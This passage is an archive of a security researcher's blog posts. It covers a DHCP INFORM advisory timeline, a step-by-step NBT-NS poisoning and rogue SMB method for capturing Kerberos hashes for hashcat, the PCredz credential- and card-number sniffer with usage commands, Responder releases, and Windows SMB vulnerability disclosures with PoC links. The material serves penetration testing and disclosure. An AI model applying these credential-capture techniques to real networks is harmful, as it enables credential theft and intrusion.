--------<br />
Set a DWORD registry key "UseInform" to "0" in each subfolder found in HKLM\SYSTEM\CCS\Services\TCP\<wbr></wbr>Interfaces\<br />
<br />
Response timeline<br />
-----------------<br />
* 18/04/2014 - Vendor notified.<br />
* 18/04/2014 - Vendor acknowledges the advisory ( [MSRC]0050886 )<br />
*
18/04/2014 - Suggested to vendor to run Responder on a A-D environment
while looking at the DHCP issue for education purposes. Since multiple
attempts were<br />
made to have them be aware that any A-D environment by
default is vulnerable if Responder is running on the subnet. Also, MSRC
was asked what<br />
code change made this DHCP INFORM issue different on Windows Vista than Windows Server 2003.<br />
* 21/04/2014 - MSRC answers with an automated response.<br />
* 08/05/2014 - Request for a reply.<br />
*
14/05/2014 - MSRC reply and refuses to share their view on the code
change, however they mention that 'The product team is investigating
whether the RFC for<br />
a DHCPINFORM message is properly implemented'.<br />
*
14/05/2014 - An email was sent to notify MSRC that no code change was
requested, but the logic behind it. Also, MSRC was asked if they were
successful with<br />
Responder.<br />
* 16/05/2014 - MSRC closes [MSRC]0050886
and doesn't provide any info on if they were successful with Responder
in their environment.<br />
<br />
<br />
References<br />
----------<br />
* Responder: <a href="https://github.com/Spiderlabs/Responder" target="_blank">https://github.com/Spiderlabs/<wbr></wbr>Responder</a><br />
* <a href="https://twitter.com/PythonResponder" target="_blank">https://twitter.com/<wbr></wbr>PythonResponder</a><br />
* <a href="http://blog.spiderlabs.com/2014/02/responder-20-owning-windows-networks-part-3.html" target="_blank">http://blog.spiderlabs.com/<wbr></wbr>2014/02/responder-20-owning-<wbr></wbr>windows-networks-part-3.html</a></div>
</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com1tag:blogger.com,1999:blog-3247452330105635425.post-5951628087396698482014-04-09T23:11:00.002-07:002014-04-09T23:41:49.935-07:00Breaking MSFT Kerberos With Responder<div dir="ltr" style="text-align: left;" trbidi="on">
I've been working on a way to get MS Kerberos v5 hashes via the Browser protocol automatically with no user interaction on a given network.<br />
(click on the pics if they don't display correctly).<br />
<br />
Often you see these requests in wireshark on an internal penetration test:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRgYVaM89-1EImSiDKh1phKA3Rp4ifcQxrEieav9bpQJXVREfEv15gL0Malg_nh2F7KwgEFHJeYVhjEZRcZgoeyqGza0z_PHK_0YGy-bWevYsHIFvDHsRUe37PsHoKCBhWrpiAop8kd2M/s1600/sam-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRgYVaM89-1EImSiDKh1phKA3Rp4ifcQxrEieav9bpQJXVREfEv15gL0Malg_nh2F7KwgEFHJeYVhjEZRcZgoeyqGza0z_PHK_0YGy-bWevYsHIFvDHsRUe37PsHoKCBhWrpiAop8kd2M/s1600/sam-2.png" height="36" width="640" /></a></div>
<br />
So I came up with a tool that automates kerberos' connection for these:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6tEYru3bPJrXHGuxkQE6Y9yZB4ocTYmr3xusydpfYCjJDXJx2-8IIp4Mex1WCf2MnxIBR0lmfkqp2Z2ybKSm00XVkuq5HaGc5m4vWZBfM42klvq0z4SyVumfir079ZqC_htzSWE4_akk/s1600/Kerberos-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6tEYru3bPJrXHGuxkQE6Y9yZB4ocTYmr3xusydpfYCjJDXJx2-8IIp4Mex1WCf2MnxIBR0lmfkqp2Z2ybKSm00XVkuq5HaGc5m4vWZBfM42klvq0z4SyVumfir079ZqC_htzSWE4_akk/s1600/Kerberos-1.png" /></a></div>
<br />
Which shows up like this in Wireshark:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh51rloMYo9Sn4HWq7qdAc9_2P13JjbZDsyv_uc4fqGgXVMnoIcZoTLuDZjwkYkyEsT-R7NDJpRZPx14USSp3Xoq5dKToFo4XNANnRLAF_QX_9Jo0I7rfkxS3M1_mGKHnk17w-Kw_AbPvM/s1600/wireshark-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh51rloMYo9Sn4HWq7qdAc9_2P13JjbZDsyv_uc4fqGgXVMnoIcZoTLuDZjwkYkyEsT-R7NDJpRZPx14USSp3Xoq5dKToFo4XNANnRLAF_QX_9Jo0I7rfkxS3M1_mGKHnk17w-Kw_AbPvM/s1600/wireshark-1.png" height="286" width="640" /></a></div>
<br />
Here's how the attack works :<br />
1) Poison a NBT-NS lookup on the domain controller service, wait for a SamLogonRequest, answer with a LogonSAMUserUnknownEX then wait for a LogonPrimaryQuery and answer with a LogonSAMUserUnknownEX.<br />
2) Setup a smb server which responds to a NegotiateProtocolRequest with the supported mech list set as kerberos:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3wk9ARcdnLTx5tYUz8ZHs1DJyegG8kA7-fCB9NUwAss6FlYOsF-FZeTGt-xZeuaOuuGjTBi9Hp7mB4F2cvTnBidP_4XgQyTacfD226c7yaaPoF7qoKRKSTe8lik5ENlVfWMjXPp1SWMA/s1600/wireshark2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3wk9ARcdnLTx5tYUz8ZHs1DJyegG8kA7-fCB9NUwAss6FlYOsF-FZeTGt-xZeuaOuuGjTBi9Hp7mB4F2cvTnBidP_4XgQyTacfD226c7yaaPoF7qoKRKSTe8lik5ENlVfWMjXPp1SWMA/s1600/wireshark2.png" height="468" width="640" /></a></div>
<br />
and wait for the Kerberos AS-REQ on UDP 88.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGen9ilf0vQGRX9BWAfcvd_6YrN2M1ePrqUAthKcXF71ukgepVFHCsXLHpbdK0pNiRyW01mJ08xfpw_VikoFDC5Rycw6hoFELHr2sFTRcdbkXmFOBcV3ATSvdpsJJCYpvPIgr5tcCE0P4/s1600/wireshark3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGen9ilf0vQGRX9BWAfcvd_6YrN2M1ePrqUAthKcXF71ukgepVFHCsXLHpbdK0pNiRyW01mJ08xfpw_VikoFDC5Rycw6hoFELHr2sFTRcdbkXmFOBcV3ATSvdpsJJCYpvPIgr5tcCE0P4/s1600/wireshark3.png" height="150" width="640" /></a></div>
<br />
Responder will then take care of the hash parsing and formating:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsQrWspBx357ZUWmO7VxvJk_p77zj1TuVOK9a7CTePOXRcmH5dr4lMZ4QYlA-4F697nnayHoS2_PgiXgVNTHLA2MSbEB_asPxN6yLXhUqeIwKsL-ElwFqfiCfMj1A_4lwxHZ64L5emTB4/s1600/mskerb1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgsQrWspBx357ZUWmO7VxvJk_p77zj1TuVOK9a7CTePOXRcmH5dr4lMZ4QYlA-4F697nnayHoS2_PgiXgVNTHLA2MSbEB_asPxN6yLXhUqeIwKsL-ElwFqfiCfMj1A_4lwxHZ64L5emTB4/s1600/mskerb1.png" height="48" width="640" /></a></div>
<br />
<br />
And will make it ready for hashcat (-m 7500):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja6VTwT1cNZxrVIdtxmiFA0lbwWtCtsvFKF1cNRrvJG0qYuAwsuIPz3lBCIDkVvPsAg-lS-8dU9xLnegFpPq5Ma9lBUwswbabpu0ngm6liC9aOJbUKFiWrcNz1hjgtP2fDLQDIdYPpOKA/s1600/kerb-cracked.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja6VTwT1cNZxrVIdtxmiFA0lbwWtCtsvFKF1cNRrvJG0qYuAwsuIPz3lBCIDkVvPsAg-lS-8dU9xLnegFpPq5Ma9lBUwswbabpu0ngm6liC9aOJbUKFiWrcNz1hjgtP2fDLQDIdYPpOKA/s1600/kerb-cracked.png" height="218" width="640" /></a></div>
<br />
This will be included in the next release of Responder (https://github.com/Spiderlabs/Responder)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Game over MSKerberosV5.<br />
<br />
<br /></div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com1tag:blogger.com,1999:blog-3247452330105635425.post-14492572758339566502014-04-08T01:12:00.002-07:002014-04-08T02:21:17.525-07:00Introducing PCredz<div dir="ltr" style="text-align: left;" trbidi="on">
PCredz was built to extract credentials from large pcap files or from a live interface.<br />
<h1>
Stats:</h1>
Stats on juicy pcap files:<br />
- 30 mo pcap file : 15s<br />
- 500mo pcap file: 1.5 minutes <br />
- 2 Go pcap file: 7 minutes.<br />
<h1>
Features:</h1>
<ul>
<li>
Extract from a pcap file or from a live interface:<br />
<ul>
<li>Credit card numbers</li>
<li>POP</li>
<li>SMTP</li>
<li>IMAP</li>
<li>SNMP community string</li>
<li>FTP</li>
<li>HTTP Basic</li>
<li>NTLMv1/v2 (DCE-RPC,SMBv1/2,LDAP, MSSQL, HTTP, etc)</li>
<li>Kerberos (AS-REQ Pre-Auth etype 2#) hashes.</li>
</ul>
</li>
<li>All hashes are displayed in a hashcat format (use -m 7500 for kerberos, -m 5500 for NTLMv1, -m 5600 for NTLMv2).</li>
<li>Log all credentials to a file (CredentialDump-Session.log).</li>
</ul>
<h1>
<a class="anchor" href="https://github.com/lgandx/PCredz#install" name="user-content-install"></a>Install:</h1>
<ul>
<li>Linux:</li>
</ul>
On a debian based OS: apt-get install python-libpcap<br />
<ul>
<li>Os X and other distributions: </li>
</ul>
wget <a href="http://downloads.sourceforge.net/project/pylibpcap/pylibpcap/0.6.4/pylibpcap-0.6.4.tar.g">http://downloads.sourceforge.net/project/pylibpcap/pylibpcap/0.6.4/pylibpcap-0.6.4.tar.g</a><br />
tar xvf pylibpcap-0.6.4.tar.gz<br />
cd pylibpcap-0.6.4<br />
python setup.py install<br />
<h1>
<a class="anchor" href="https://github.com/lgandx/PCredz#usage" name="user-content-usage"></a>Usage:</h1>
./Pcredz -f file-to-parse.pcap<br />
./Pcredz -d /tmp/pcap-directory-to-parse/<br />
./Pcredz -i eth0<br />
Options:<br />
-h, --help show this help message and exit<br />
-f capture.pcap Pcap file to parse<br />
-d /home/pnt/pcap/ Pcap directory to parse recursivly<br />
-i eth0 interface for live capture<br />
-v More verbose.<br />
<br />
<br />
<b>You can download PCredz here</b>: <br />
https://github.com/lgandx/PCredz<br />
<h1>
</h1>
</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com1tag:blogger.com,1999:blog-3247452330105635425.post-22040647733752542962014-01-05T16:11:00.000-08:002014-01-05T19:35:11.209-08:00thoughts on NSA and our future<div dir="ltr" style="text-align: left;" trbidi="on">
NSA recent disclosures, makes the paranoid not so paranoid after all.<br />
<br />
We confirmed, that they will listen on your call, your internet session, etc, particularly if you're a foreigner; me and you.<br />
<br />
The whole current B.S is about "So what you're doing, is U.S constitutionally compliant ?" and everyone knows, if you're asking the question at the first place, it's probably because it is not and so people focus on having the U.S intelligence community to stop doing this. This might take a while doh...<br />
<br />
<b>What will happens after restriction applies (if it does) :</b><br />
<br />
- NSA will act upon their new interpretation on the word "Spying" and will gather the same kind of data, in a different way, since it is presented in a different way.<br />
- If they can't, they will reach and use their CSEC friends or any five eyes friends and get that data since it was collected as normal spying operation from a foreign gov, but since they are friendly, they share the info and then it is not collected by the NSA but acquired.<br />
<b></b><br />
<b>Oath Of Office:</b><br />
<br />
Oaths of office are a statement of loyalty to a <a href="http://en.wikipedia.org/wiki/Constitution" title="Constitution">constitution</a>
or other legal text or to a person or other office-holder (e.g., an
oath to support the constitution of the state, or of loyalty to the
king). Under the laws of a state it may be considered <a href="http://en.wikipedia.org/wiki/Treason" title="Treason">treason</a> or a <a href="http://en.wikipedia.org/wiki/High_crimes_and_misdemeanours" title="High crimes and misdemeanours">high crime</a> to betray a sworn oath of office.
<br />
If you expose wrongdoing done by your gov, which is against the constitution, it should be seeing as Oath right of disclosure, in order to protect the constitution.<br />
<b>See : </b><b><b>http://en.wikipedia.org/wiki/Oath_of_office </b></b><br />
<br />
<b><b> </b> </b><br />
<b>So what are your options ?</b><br />
You should encrypt everything you do. <br />
<br />
That simple. Don't wait for U.S congress to say "The way you defined it, it is illegal".<br />
Move on and encrypt your communications right now.<br />
The justice system, in the US and mostly around the world, works on a double standard and when it's time to have privacy, you don't have a word to say, or if you prefer your words will be listen.<br />
Your pick on how you want to behave online.</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-52052757796616003302013-12-30T00:46:00.003-08:002013-12-30T00:47:39.681-08:00Responder 2.0 is out<div dir="ltr" style="text-align: left;" trbidi="on">
A quick blog post to let you know that Responder 2.0 Beta is out:<br />
- https://github.com/Spiderlabs/Responder<br />
<br />
This version includes several new rogue auth servers, SMB Relay and much much more.<br />
<br />
If you enjoy internal pentests, stay tuned on http://blog.spiderlabs.com, a complete blog post will be detailing all new functionalities and some actual Responder wushu.<br />
<br />
Happy new year all.</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-75665193279205032742013-02-06T16:23:00.003-08:002013-02-06T16:27:31.986-08:00Some fun with Responder 1.8<div dir="ltr" style="text-align: left;" trbidi="on">
I've made a short video on Responder 1.8 usage and examples.<br />
<br />
This video can be found here: <a href="http://www.youtube.com/watch?v=nkpK5lIPHg8">http://www.youtube.com/watch?v=nkpK5lIPHg8</a><br />
<br />
Note that on the latest version, when you open IE * you wont get any password prompt for WPAD (not like in this video) and your browser will send your NTLM hashes along transparently.<br />
<br />
As always, latest version can be found here: https://github.com/SpiderLabs/Responder/ <br />
<br />
Cheers</div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com1tag:blogger.com,1999:blog-3247452330105635425.post-10917744723425082082013-01-24T07:35:00.000-08:002013-01-24T07:35:01.406-08:00Owning Windows Networks with Responder 1.7<div dir="ltr" style="text-align: left;" trbidi="on">
Full post and download link can be found here :<br />
<br />
http://blog.spiderlabs.com/2013/01/owning-windows-networks-with-responder-17.html </div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-87656547049494525422012-10-24T11:13:00.004-07:002012-10-24T11:14:32.287-07:00Introducing Responder 1.0<div dir="ltr" style="text-align: left;" trbidi="on">
I recently released a LLMNR/NBT-NS responder with several rogue auth servers.<br />
<br />
Full details about this tool and download link can be found here : <a href="http://blog.spiderlabs.com/2012/10/introducing-responder-10.html">http://blog.spiderlabs.com/2012/10/introducing-responder-10.html</a><br />
<br /></div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com2tag:blogger.com,1999:blog-3247452330105635425.post-8381345342771539922012-09-05T22:36:00.000-07:002012-09-06T08:58:57.036-07:00When MSFT does not respect their own protocol.<div dir="ltr" style="text-align: left;" trbidi="on">
According to this : http://support.microsoft.com/kb/909264<br />
<br />
NetBIOS computer names cannot contain the following characters:<br />
<ul style="text-align: left;">
<li>backslash (\)</li>
<li>slash mark (/)</li>
<li>colon (:)</li>
<li>asterisk (*)</li>
<li>question mark (?)</li>
<li>quotation mark (")</li>
<li>less than sign (<)</li>
<li>greater than sign (>)</li>
<li>vertical bar (|)</li>
</ul>
Let see how MSFT implemented their own protocol in their in house tools: <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoQP_CsfF-Gts4IC8O5meQTWQkaoCDZW6QYVd342mg-1Fv8M2ja5MSZCOjb0WNN4-p-QyF3TuWt7gQLCYhTyQ8KJ7mAUEopOPuB7Qhk5CAHu95VU-vLi7bw6UgaJw5CO832HN1lzJjziw/s1600/Screenshot+from+2012-09-06+01:32:57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="236" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjoQP_CsfF-Gts4IC8O5meQTWQkaoCDZW6QYVd342mg-1Fv8M2ja5MSZCOjb0WNN4-p-QyF3TuWt7gQLCYhTyQ8KJ7mAUEopOPuB7Qhk5CAHu95VU-vLi7bw6UgaJw5CO832HN1lzJjziw/s640/Screenshot+from+2012-09-06+01:32:57.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqvKQ3SEzwhNAgdTiaXA3uNhY6-F0Wbtvwxc0UmFyx_2wAZRVRYPm1vQaqVGaz-Iuwrrp3ZbucHESn5Uhi3oEeesrSV7YHjIG31AKRw44fMwbPOBlfmALcmIlXrA2nKzyLMvQABt3TAB0/s1600/Screenshot+from+2012-09-06+01:34:35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqvKQ3SEzwhNAgdTiaXA3uNhY6-F0Wbtvwxc0UmFyx_2wAZRVRYPm1vQaqVGaz-Iuwrrp3ZbucHESn5Uhi3oEeesrSV7YHjIG31AKRw44fMwbPOBlfmALcmIlXrA2nKzyLMvQABt3TAB0/s640/Screenshot+from+2012-09-06+01:34:35.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Ok great...<br />
<br />
What about the rest ?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcrtlqdWl81S52adkha30WAL31OGQM2pV2NOQSJWxY8o7gy3hHu0IyiUAGwj-JnsRq02f39PBb_FXfPeFiQM2_1bd2FaieimQyTI_NQaBI0YLFAPk9SJtAP0qfOA26LvzZkaiB-cK8Ix0/s1600/Screenshot+from+2012-09-06+01:20:56.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="283" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcrtlqdWl81S52adkha30WAL31OGQM2pV2NOQSJWxY8o7gy3hHu0IyiUAGwj-JnsRq02f39PBb_FXfPeFiQM2_1bd2FaieimQyTI_NQaBI0YLFAPk9SJtAP0qfOA26LvzZkaiB-cK8Ix0/s640/Screenshot+from+2012-09-06+01:20:56.png" width="640" /></a></div>
<br />
Alright. Let's see:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ_HXW3jSJd7gvNWp-IpDrDJieclJlx0pNT1hRhyphenhyphenDz34FkROgmIMbkeAzOEIKs6zXxTb_Nk-5xpvUCz8KrxenLqmyNMm4BXAFGbjhQ9Pw71WtaiK5N2ZvTsU-9wyVERjhj7wmQ-MkUxbY/s1600/Screenshot+from+2012-09-06+01:25:34.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="48" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZ_HXW3jSJd7gvNWp-IpDrDJieclJlx0pNT1hRhyphenhyphenDz34FkROgmIMbkeAzOEIKs6zXxTb_Nk-5xpvUCz8KrxenLqmyNMm4BXAFGbjhQ9Pw71WtaiK5N2ZvTsU-9wyVERjhj7wmQ-MkUxbY/s640/Screenshot+from+2012-09-06+01:25:34.png" width="640" /></a></div>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitU0H5TUSat3TkedrgY_NFT1xO5ByDO-AwqZB9Si4N7ZuzdZ7QRVce3LhqaCjUiTCFcA67gtZJS0nr-BhKOE7oIX7S3wzmInEOXbK4mEr-lxQcveVl9A4g4iw8KGEn9IOnsww1Wd5JrSI/s1600/Screenshot+from+2012-09-06+01:23:40.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitU0H5TUSat3TkedrgY_NFT1xO5ByDO-AwqZB9Si4N7ZuzdZ7QRVce3LhqaCjUiTCFcA67gtZJS0nr-BhKOE7oIX7S3wzmInEOXbK4mEr-lxQcveVl9A4g4iw8KGEn9IOnsww1Wd5JrSI/s640/Screenshot+from+2012-09-06+01:23:40.png" width="640" /></a></div>
<br />
<br />
MSFT Rule #78: Do what I say, not what I do.<br />
<br />
*Update:<br />
<br />
Net view example: <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhnXm65VXVZfj7pFJhovk6RLLQcHd1xA9kDOMYZNWFgr5AjWexU7lx1sfYkAXvmgU0VSrQq7oWKkpSuyhTMDk6cHATia6I7tP7687EgpZ5U_bG12aP_x8rA5L0yYoJJtKJYbDlFpLtJk/s1600/Screenshot+from+2012-09-06+11:52:07.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPhnXm65VXVZfj7pFJhovk6RLLQcHd1xA9kDOMYZNWFgr5AjWexU7lx1sfYkAXvmgU0VSrQq7oWKkpSuyhTMDk6cHATia6I7tP7687EgpZ5U_bG12aP_x8rA5L0yYoJJtKJYbDlFpLtJk/s640/Screenshot+from+2012-09-06+11:52:07.png" width="640" /></a></div>
<br /></div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com2tag:blogger.com,1999:blog-3247452330105635425.post-58473561467388191542012-05-10T00:31:00.000-07:002012-10-15T19:12:00.139-07:00Slides for Turning Client Side To Server Side RuxMon 2011 (Melbourne)<div dir="ltr" style="text-align: left;" trbidi="on">
Long time no blog;<br />
I gave that talk in March 2011 at <a href="http://www.ruxcon.org.au/ruxmon/" target="_blank">Ruxmon</a>.<br />
I thought I should share this, since this blog is a kinda repository of some bugs i've published.<br />
<br />
Thanks to the ruxcon&ruxmon crew !<br />
<br />
<a href="http://www.slideshare.net/fullscreen/lgandx/turning-clientsidetoserversideruxcon2011laurent/1">http://www.slideshare.net/fullscreen/lgandx/turning-clientsidetoserversideruxcon2011laurent/1</a></div>
Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com0tag:blogger.com,1999:blog-3247452330105635425.post-26646588725769123332010-08-11T17:37:00.000-07:002010-08-11T17:39:06.762-07:00MS SMB Remote Trans2 Zero Size Pool Allocation (MS10-054)This SMBv1 vulnerability has been disclosed to MS back in february 2010 and patched this month in MS10-054 bulletin.<br />
<br />
This vulnerability is quite interesting since it's present in all Windows version since <i>Windows 2000</i>, and can be triggered easily in at least 2 different Trans2 opcode by setting a Max Data Count to 0;<br />
- <i>QUERY_FS_INFO Query FS Attribute Info</i><br />
- <i>QUERY_FS_INFO, Query FS Volume Info</i><br />
<i></i><br />
<br />
You can find the full advisory here: http://seclists.org/fulldisclosure/2010/Aug/122<br />
SRD blog entry: http://blogs.technet.com/b/srd/archive/2010/08/10/ms10-054-exploitability-details-for-the-smb-server-update.aspxLaurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com1tag:blogger.com,1999:blog-3247452330105635425.post-91300418491257334682010-05-12T06:16:00.000-07:002010-05-13T04:38:02.009-07:00Fuzzing lib releasedThis is a fuzzing lib I've been working on for a while (it's not a complete one, but still pretty powerfull), you can adapt it very easily to your fuzzer by invoking ;<br />
<br />
import lib<br />
from lib import *<br />
<br />
Then you call one specific function, or randfunc().<br />
randfunc will basicaly choose randomly the function in the lib to fuzz with. <br />
<br />
Here's a quick example using this lib;<br />
<br />
http://pastebin.com/fNFAW3Fh -- > this is not a smb fuzzer, it's simply an example of using this lib....<br />
<br />
And yes you need to include the lib, which is located here ;<br />
<br />
http://pastebin.com/xgPXpGtw<br />
<br />
Enjoy !Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com2tag:blogger.com,1999:blog-3247452330105635425.post-46513026685271549892010-04-17T07:12:00.000-07:002010-04-17T07:42:14.600-07:00MS10-020This bug was discovered back in december 2009, and patched by microsoft in April 2010.<br />
This issue is a basic stack overflow affecting only windows 7/2008R2 smb1 implementation.<br />
It's actually a nice bug as the affected function is not protected by a canary, and allow us to redirect the flow anywhere we want to.<br />
You can find the full advisory about this bug here : http://seclists.org/fulldisclosure/2010/Apr/201<br />
Have phun !<br />
PoC url : http://pastebin.com/h3jSyJTN<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUFM5GIUe4VhqM1XDk-1Q60mhc5Nt1LolO6pS8El_uG2yGOeMXfsZGlM26XWuLc2McBWNcdvW6g3Xz6_jeY0pEQ0rhwt3Nx9Ab8jyvecvuat13xYFtxE8BKrlHEiVkw2CYS9ef-ra-wvM/s1600/Windows7-32-2010-04-17-16-52-17.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUFM5GIUe4VhqM1XDk-1Q60mhc5Nt1LolO6pS8El_uG2yGOeMXfsZGlM26XWuLc2McBWNcdvW6g3Xz6_jeY0pEQ0rhwt3Nx9Ab8jyvecvuat13xYFtxE8BKrlHEiVkw2CYS9ef-ra-wvM/s320/Windows7-32-2010-04-17-16-52-17.png" /></a></div>Laurent Gaffié bloghttp://www.blogger.com/profile/08377956323092605195noreply@blogger.com3